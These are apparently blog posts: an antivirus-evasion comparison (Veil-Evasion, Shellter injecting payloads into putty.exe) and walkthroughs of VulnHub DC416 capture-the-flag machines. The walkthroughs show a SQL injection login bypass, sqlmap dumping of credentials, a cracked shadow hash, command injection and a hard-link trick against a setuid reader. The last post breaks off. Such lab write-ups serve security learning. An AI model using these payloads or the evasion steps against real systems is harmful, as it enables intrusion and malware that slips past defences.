Hmmm, still to high detection ratio.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Veil-evasion</div>
<div class="separator" style="clear: both; text-align: left;">
Veil evasion is a very useful tool which is compatible with metasploit payloads.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzppPNeMCi9mJLAFZZY9qPRa_CHYTV8o5rsS_iK1x7GEITAckkFRrtJt3wgZApRfFQa9dwXTgVviQm2Hl2VD8y4UX_9433Gm6D1hKXjsczovFW9aNJ5984fWwDJA-pchH2rOpvMZD8zRI/s1600/veil.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzppPNeMCi9mJLAFZZY9qPRa_CHYTV8o5rsS_iK1x7GEITAckkFRrtJt3wgZApRfFQa9dwXTgVviQm2Hl2VD8y4UX_9433Gm6D1hKXjsczovFW9aNJ5984fWwDJA-pchH2rOpvMZD8zRI/s400/veil.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's lists payloads</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySc2P0kgOfvogdCRfEkheUYbOnNTu6LsVrEpoCEI9Yy2I2zL7K9h2CaXFZm79bpjLCRu2nTG79LGvKTGGuTxTRqJXH2BJyr61zYAgaCvJR50bN0dmO8kg3_nvtJx0aiLdfd6SK870_OM/s1600/veil_payloads.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySc2P0kgOfvogdCRfEkheUYbOnNTu6LsVrEpoCEI9Yy2I2zL7K9h2CaXFZm79bpjLCRu2nTG79LGvKTGGuTxTRqJXH2BJyr61zYAgaCvJR50bN0dmO8kg3_nvtJx0aiLdfd6SK870_OM/s400/veil_payloads.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Good, let's use for example payload <b>35.</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJ282GSTWXBjn3l392hoGmhEqG-AXsilwtUos1ZL9D_HIhMbt6ViAqFgEV1K8_5uYk3B9Meg4m_WEGufbyhrbjBhxwHnhQE3Lmq6JOpz-0p75YOBejgsNi4jjXcbU7A2qUuiInMSqcig/s1600/veil_av.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJ282GSTWXBjn3l392hoGmhEqG-AXsilwtUos1ZL9D_HIhMbt6ViAqFgEV1K8_5uYk3B9Meg4m_WEGufbyhrbjBhxwHnhQE3Lmq6JOpz-0p75YOBejgsNi4jjXcbU7A2qUuiInMSqcig/s400/veil_av.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Quite nice! Detection ratio is lower than 50%.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. Shellter</div>
<div class="separator" style="clear: both; text-align: left;">
Shellter is the most effective tool to bypass AV detection. Shellter utilize no-malcious program such as putty.exe and incject malicious instruction.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcV44PU9xxXa446_TwEneSOZobNiZBoHBsxZHsZB6caF2nKCVog-bD01HsdapD6Pn1xQnJYBPbQJ3mZTAHzvK9P5YdrsAP7BWALqibLKmOgnV_6z05G74aqPmMmDKdhzAUhPkQLDVRZCI/s1600/shellter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcV44PU9xxXa446_TwEneSOZobNiZBoHBsxZHsZB6caF2nKCVog-bD01HsdapD6Pn1xQnJYBPbQJ3mZTAHzvK9P5YdrsAP7BWALqibLKmOgnV_6z05G74aqPmMmDKdhzAUhPkQLDVRZCI/s400/shellter.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can use <b>A (automation)</b> mode. Next we have to set PE target - file which we will inject.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2hMngCReiY10L24sCanrjJU93fyFvqr_-4beB2pFsQ_CC4hSzbIEY4LNsmMvHVyKCw5Au3fZNtYc3cjWvPoF_EyPOvxla5pbNK-TV_O_wycj1RtgoH05qOQIEOMt7cz1czWI3NK-Fcs/s1600/shellter_koniec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2hMngCReiY10L24sCanrjJU93fyFvqr_-4beB2pFsQ_CC4hSzbIEY4LNsmMvHVyKCw5Au3fZNtYc3cjWvPoF_EyPOvxla5pbNK-TV_O_wycj1RtgoH05qOQIEOMt7cz1czWI3NK-Fcs/s400/shellter_koniec.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Great! For me detection ratio is very low, isn't it?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As we can see <b>shellter</b> is very effective tool to AV evasion.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-89201323308148519412017-02-13T14:35:00.000+01:002017-02-13T14:35:15.171+01:00DC146:2016 dick dastardlyHello,<br />
<br />
Now it is turn to <b>dick dastardly </b>challenge!<br />
<br />
Scanning all ports...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxRDwfoFiEY51xHhFAE5uAsDLXGKzXCgj7qoDuPWH0hYFTiUZezki1dnO2H7q15EwviGzJcnQyfQcmHpL00Rf9znhIAyn_5vKgAI3D8fyVxfHSALOPLluwCovXTCTnnqOyiURkx2J4vU/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxRDwfoFiEY51xHhFAE5uAsDLXGKzXCgj7qoDuPWH0hYFTiUZezki1dnO2H7q15EwviGzJcnQyfQcmHpL00Rf9znhIAyn_5vKgAI3D8fyVxfHSALOPLluwCovXTCTnnqOyiURkx2J4vU/s400/nmap.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Enumerating web pages<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbeKopYQJRlcqeNZahP5pjS4Jg6kqMGbxEYzfs_ItaV2xANYUewTfgPMBbHa7kv3TLmCnclhulYI7kn1HDGDzFGlRUbr_nzOGM3XQdoJZTSdqTqwm8hVqwFPAKEU4yCh9SZK_rscMyhk/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbeKopYQJRlcqeNZahP5pjS4Jg6kqMGbxEYzfs_ItaV2xANYUewTfgPMBbHa7kv3TLmCnclhulYI7kn1HDGDzFGlRUbr_nzOGM3XQdoJZTSdqTqwm8hVqwFPAKEU4yCh9SZK_rscMyhk/s400/dirb.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! The dirb scanner found several interesting files on our target.<br />
The <b>admin.php</b> redirect us to <b>index.php</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNFCF8CLjEAsRjb_y2j73mTaTDbLFKgJ3wRMiPLgZzVkU7OFhvb4yJW59YTWygBAfzd8bnUq_QtS-_mq1fiT8VqSQxPdkrruaBaQ6An2rpM8FH2WpVgXUmFVPbFqdOkEJkB9jMEJcSNoM/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNFCF8CLjEAsRjb_y2j73mTaTDbLFKgJ3wRMiPLgZzVkU7OFhvb4yJW59YTWygBAfzd8bnUq_QtS-_mq1fiT8VqSQxPdkrruaBaQ6An2rpM8FH2WpVgXUmFVPbFqdOkEJkB9jMEJcSNoM/s400/admin.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very interesting. Filling in username as <b>admin</b> and password as <b>' OR 1=1 -- -</b> we have got following result<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLU7OskZjH28oTfFb91UEyQ5Jgg3Wf7o2bVXz4CIqiSeMSfX01gPRCyktnZgL3oPNYeNsRNKZVQlXkNOPjXgNuZaLvU2ys3hjNwmEKxxhhlOcuA5GEingMO55T2UFyKTAUm-TEK4O8GqI/s1600/adminek.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLU7OskZjH28oTfFb91UEyQ5Jgg3Wf7o2bVXz4CIqiSeMSfX01gPRCyktnZgL3oPNYeNsRNKZVQlXkNOPjXgNuZaLvU2ys3hjNwmEKxxhhlOcuA5GEingMO55T2UFyKTAUm-TEK4O8GqI/s400/adminek.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice! Now we are able to use <b>sqlmap</b> and try to find valid credentials.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvS87WWp-dpNEuLsqAAOgjaZrasiNuSuGi1-35re5lp84WW8aP_qsoFwkXpvEwUH2tUqQEt87QDwER6O49JOaYm2maXSusHtptknIelcllr7IHqJMf4LxX-A2j8BNYejW8kLGBUOOpD8/s1600/sqlmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvS87WWp-dpNEuLsqAAOgjaZrasiNuSuGi1-35re5lp84WW8aP_qsoFwkXpvEwUH2tUqQEt87QDwER6O49JOaYm2maXSusHtptknIelcllr7IHqJMf4LxX-A2j8BNYejW8kLGBUOOpD8/s400/sqlmap.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, let's enumerate deeper! Unfortunately we are not able to retrieve databases names. So, we have to look for other opportunity to get these names.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga9sGSEuN5kD2xVKgRiWjhyphenhyphentkcv1Vb6yC-sAhR4AJCOb8f2LLa4JEAy898IwgN-3gFkvWoGUKiC8P-mfGZ_kQfjBtSZM8EzgFW7rGXZFinuHMb7SUJxGiZHBdMR-4XOWQpjVnX8Lk5m5s/s1600/nmap1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga9sGSEuN5kD2xVKgRiWjhyphenhyphentkcv1Vb6yC-sAhR4AJCOb8f2LLa4JEAy898IwgN-3gFkvWoGUKiC8P-mfGZ_kQfjBtSZM8EzgFW7rGXZFinuHMb7SUJxGiZHBdMR-4XOWQpjVnX8Lk5m5s/s400/nmap1.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We found second vulnerable parameter. Let's enumerate databases<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFvO4kCoKRNPh2stqyKsPpK98MbVzW7ZKrxSBU4CcymBcvkT8gMXzyCmb2cNE3gMxNMdLHgeYTl_6Op9TEP1vKVfekLTbj4H3Du94rd7cW9umO0R1fYE4TBKbBLB6hg_vqQsGLmjti8Q/s1600/dbs.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFvO4kCoKRNPh2stqyKsPpK98MbVzW7ZKrxSBU4CcymBcvkT8gMXzyCmb2cNE3gMxNMdLHgeYTl_6Op9TEP1vKVfekLTbj4H3Du94rd7cW9umO0R1fYE4TBKbBLB6hg_vqQsGLmjti8Q/s200/dbs.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Very good, let's examine <b>vulnhub</b> database.<br />
<blockquote class="tr_bq">
Database: vulnhub<br />Table: admins<br />[1 entry]<br />+----+--------------------------------------+--------+<br />| id | pass | user |<br />+----+--------------------------------------+--------+<br />| 1 | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta |<br />+----+--------------------------------------+--------+</blockquote>
It is not SSH valid password for <b>rasta</b> username :( I don't know for what is the password.<br />
After clicking on <b>add IP to IRC whitelist</b> I performed nmap scanning again and I have got very interesting result<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyj0xGi6ua_p4Gfwxl9kpVgveQ7vX8hDEq3Yer80fDhV3t7WiX4zO9G7lKDE4BZoKIn4S2J00RQ0W37QFVfIVtKmWEDKcTTiK6AyVI4Wmm-AqrqAqPO1NuqttMloE_N9_27UtlQ0AdkbY/s1600/irc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyj0xGi6ua_p4Gfwxl9kpVgveQ7vX8hDEq3Yer80fDhV3t7WiX4zO9G7lKDE4BZoKIn4S2J00RQ0W37QFVfIVtKmWEDKcTTiK6AyVI4Wmm-AqrqAqPO1NuqttMloE_N9_27UtlQ0AdkbY/s400/irc.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very good! I installed <b>irssi</b> on my attacker machine and I connected to our target IRC.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGgTaMY81Dubrd4Rv_yWUsCcq5_8T4GsHqSjgLzuO_ERLhOSvHvew_31vOAjo0dNM9YOzLIo_m6UwCQ2Tzk3zWYRtmKRwmd2y8XF2ooxHc2ulO3rPtdV0Bhv7Cpt0vR0FWzTCI186Wy8I/s1600/irc1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGgTaMY81Dubrd4Rv_yWUsCcq5_8T4GsHqSjgLzuO_ERLhOSvHvew_31vOAjo0dNM9YOzLIo_m6UwCQ2Tzk3zWYRtmKRwmd2y8XF2ooxHc2ulO3rPtdV0Bhv7Cpt0vR0FWzTCI186Wy8I/s320/irc1.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-55949373360734499962017-02-09T12:47:00.001+01:002017-02-10T10:23:12.430+01:00DC146:2016 fortress challengeHello,<br />
Now it is time to struggle with <b>fortress</b> challenge.<br />
<br />
Scanning phase gave us following result<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xY99ShH-V-nD87CRwAzSEXZ1ci9f5B-gtp602zJyu9r9l9omZB8aSksdMFUdzNB3ktnloIdKahnEc6BIA_N9-3DbhXGqUYAgCdiPPNAlUPQ_zcuuYt3UEesRALQdxzEIaZFuXO4X2FI/s1600/fortress_nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xY99ShH-V-nD87CRwAzSEXZ1ci9f5B-gtp602zJyu9r9l9omZB8aSksdMFUdzNB3ktnloIdKahnEc6BIA_N9-3DbhXGqUYAgCdiPPNAlUPQ_zcuuYt3UEesRALQdxzEIaZFuXO4X2FI/s640/fortress_nmap.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Our situation is very simple, but only three open ports.<br />
So, let's begin our penetration tests from web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfoXVwNX3nJVRsSyWAknW_zi1XoBWAbQ9T_r-mFyfdktnJiTG0tPFNOeMBYfq5X618QplVoJVpNPgW5tN_ZRSgeTvZjnEEwOqkVMmBdrpbDFtzN_MkNNA052oWfUcKg7B4Sa7HCOhdM4w/s1600/fortress_dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfoXVwNX3nJVRsSyWAknW_zi1XoBWAbQ9T_r-mFyfdktnJiTG0tPFNOeMBYfq5X618QplVoJVpNPgW5tN_ZRSgeTvZjnEEwOqkVMmBdrpbDFtzN_MkNNA052oWfUcKg7B4Sa7HCOhdM4w/s400/fortress_dirb.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We discovered <b>scanner.php</b> file. Let's examine it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ehjXMbgCIQUS6PoHtAwnIvySVvBxv8zy4HeD5U9JvNTdD_tSu8BkEORqTE01kTXJ5Z3lS2YlWrbexbp2OVWXGhdcboUsZUNMjljbkRZjUaO8MzEokRDToksOVb5ojHXDVlNuF3j6Jd4/s1600/scanner.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ehjXMbgCIQUS6PoHtAwnIvySVvBxv8zy4HeD5U9JvNTdD_tSu8BkEORqTE01kTXJ5Z3lS2YlWrbexbp2OVWXGhdcboUsZUNMjljbkRZjUaO8MzEokRDToksOVb5ojHXDVlNuF3j6Jd4/s400/scanner.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, we know how work this scanner. We know how looks like nmap command which is utilize by the scanner.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDzfOjX6dN8CRR6BgbVyDPTc58KD4hGfA65du_1KKlFmpXnmfC5HvW3CeLY4qtrseC4Z58IdodLHjIjoYhf-1sLtF6WH1H9lGHGVYUEYaIUREuUpLmA0GDYrPitjVl5KKz0p6Jx0exDyc/s1600/burp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDzfOjX6dN8CRR6BgbVyDPTc58KD4hGfA65du_1KKlFmpXnmfC5HvW3CeLY4qtrseC4Z58IdodLHjIjoYhf-1sLtF6WH1H9lGHGVYUEYaIUREuUpLmA0GDYrPitjVl5KKz0p6Jx0exDyc/s400/burp.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We added <b>id</b>, so let's verify how looks like result.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgNumSq-dc225qK3HoSJ3Q_ODnvSauhHvATDHje2nLmRhLnsyj_SaTH20Nblgn770IStzJRwQ8LbCfeSwUIAsGxgL27DErKqcIhACggnFj-uczHPCRHFLvg4_3mglumGNElsNLcBAiEs/s1600/id.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgNumSq-dc225qK3HoSJ3Q_ODnvSauhHvATDHje2nLmRhLnsyj_SaTH20Nblgn770IStzJRwQ8LbCfeSwUIAsGxgL27DErKqcIhACggnFj-uczHPCRHFLvg4_3mglumGNElsNLcBAiEs/s400/id.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! It works.So, let's try examine target deeper.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixinkV8Nw0RGQSaO9WExqV1Bzj-1z-eniOsOmiz_WOq-7j4JBkrw662wtN5jLWmIQRCwIdiI7okj8qwFguro2ElvYK0Cb7S4V2HcLMWbrVdxjUAcU8QS5_PDfJqgpVtqfQ32XSjrfDBY8/s1600/repeater.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixinkV8Nw0RGQSaO9WExqV1Bzj-1z-eniOsOmiz_WOq-7j4JBkrw662wtN5jLWmIQRCwIdiI7okj8qwFguro2ElvYK0Cb7S4V2HcLMWbrVdxjUAcU8QS5_PDfJqgpVtqfQ32XSjrfDBY8/s640/repeater.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We have got something like one line from <b>/etc/shadow</b>.<br />
After a lot of time...<br />
<blockquote class="tr_bq">
<pre><code>$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:931qwerty?</code></pre>
</blockquote>
Good, so we know that SSH port is open.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5a-dfYlWPotitfFW2AoJsRIQ2kFn8JjoEFOMZjYYnHulMI4LphTE7tz_YRHMVo45S2CQbGxSW7DJHNs8V6OJ4tFJXgCV7eymG6oMdx1v64Jjzmw4Y3ernyK561AJRDU6x3aSYTH1WFo/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="463" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5a-dfYlWPotitfFW2AoJsRIQ2kFn8JjoEFOMZjYYnHulMI4LphTE7tz_YRHMVo45S2CQbGxSW7DJHNs8V6OJ4tFJXgCV7eymG6oMdx1v64Jjzmw4Y3ernyK561AJRDU6x3aSYTH1WFo/s640/ssh.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We obtained limited shell!Unfortunately goal of this challenge is finding flags only.<br />
<br />
<b>Flag #1</b><br />
<blockquote class="tr_bq">
$ cat flag.txt <br />
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}<br />
$ pwd<br />
/usr/home/craven</blockquote>
<b>Flag #2</b><br />
Looking for next flag I found in the <b>/usr/local/www/</b> directory<br />
<blockquote class="tr_bq">
$ ls<br />
index.html k1ngd0m_k3yz logo.png s1kr3t scanner.php styles.css<br />
$ cd s1kr3t/<br />
$ ls<br />
flag.txt<br />
$ cat flag.txt <br />
FLAG{n0_one_br3aches_teh_f0rt}</blockquote>
<b>Flag #3</b> <br />
The last flag is located in <b>/home/vulnhub/</b> directory<br />
<blockquote class="tr_bq">
$ ls<br />flag.txt reader<br />$ cat flag.txt <br />cat: flag.txt: Permission denied</blockquote>
Hmmm, it is not surprise for me :-) So, let's examine <b>reader</b> file<br />
<blockquote class="tr_bq">
$ file reader <br />reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped<br />$ ./reader <br />./reader [file to read]</blockquote>
Very useful! We know that we are able to read some files using reader file.<br />
<blockquote class="tr_bq">
$ ./reader /etc/passwd<br />Checking file type...<br />Checking if flag file...<br />Great! Printing file contents...<br />Win, here's your flag: <br /># $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $</blockquote>
Hmmm, a little strange.<br />
<blockquote class="tr_bq">
$ ./reader flag.txt<br />Checking file type...<br />Checking if flag file...<br />Nope. Can't let you have the flag.</blockquote>
Hmmm, let's try create symlink for <b>flag.txt</b><br />
<blockquote class="tr_bq">
$ ln -s flag.txt /tmp/flagg.txt<br />$ ./reader /tmp/flagg.txt<br />Checking file type...<br />Symbolic links not allowed!</blockquote>
Grrrr, maybe hard link will conduct us to success?<br />
<blockquote class="tr_bq">
$ ln -f flag.txt /tmp/flagh.txt<br />$ ./reader /tmp/flagh.txt <br />Checking file type...<br />Checking if flag file...<br />Nope. Can't let you have the flag.<br />$ ln -f flag.txt /tmp/test<br />$ ./reader /tmp/test <br />Checking file type...<br />Checking if flag file...<br /><b>Great! Printing file contents...<br />Win, here's your flag: <br />FLAG{its_A_ph0t0_ph1ni5h}</b></blockquote>
It is end of the challenge :) rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-57334711136569522792017-01-24T10:01:00.000+01:002017-02-01T15:01:20.365+01:00DC146:2016 basement challengeHello,<br />
<br />
Today I would like to present dc416-2016-basement challenge walkthrough.<br />
<br />
Nmap port scanning.<br />
<br />
Looking for our target, we discovered that the machine has assigned <b>192.168.253.30</b> IP address.<br />
<br />
Now, let's try check what kind of services serves our target.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYh7c-aS4SE4F6lVt8oUdVi08OFFy4wnYC6c_uFJpbQRQX-pi1ScStmmbUQbnAhdgQrAg59avfTEfobhGiv7q5WERKwScvc76FZ_mJM0WJcpcGD3yykbBGXUmCUfIiRuCbiN32GUUsg58/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYh7c-aS4SE4F6lVt8oUdVi08OFFy4wnYC6c_uFJpbQRQX-pi1ScStmmbUQbnAhdgQrAg59avfTEfobhGiv7q5WERKwScvc76FZ_mJM0WJcpcGD3yykbBGXUmCUfIiRuCbiN32GUUsg58/s400/nmap.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, <b>nmap</b> scanning has discovered <b>4 open ports.</b> We can see that the target uses <b>port 8080</b> as a HTTP Proxy. Hmmm, interesting.<br />
<br />
Let's begin our penetration test from <b>80 HTTP port.</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic3ZnVWxwMJRuecXPxS5uf4sUq1vFVSfJWGR4PwqLMBbHUGFDY7M6kpnDQZgmtk3VR9olVa2cNuKSG3gwMO-03MsWsi4AfvxybGn5BrlWEnK9V7yNmoQos0e88URq-4jpPv5h-wGYWPVg/s1600/www.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic3ZnVWxwMJRuecXPxS5uf4sUq1vFVSfJWGR4PwqLMBbHUGFDY7M6kpnDQZgmtk3VR9olVa2cNuKSG3gwMO-03MsWsi4AfvxybGn5BrlWEnK9V7yNmoQos0e88URq-4jpPv5h-wGYWPVg/s400/www.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I run DirBuster, but it doesn't find anything interesting and useful... So let's check what is hosted on <b>port 10000</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
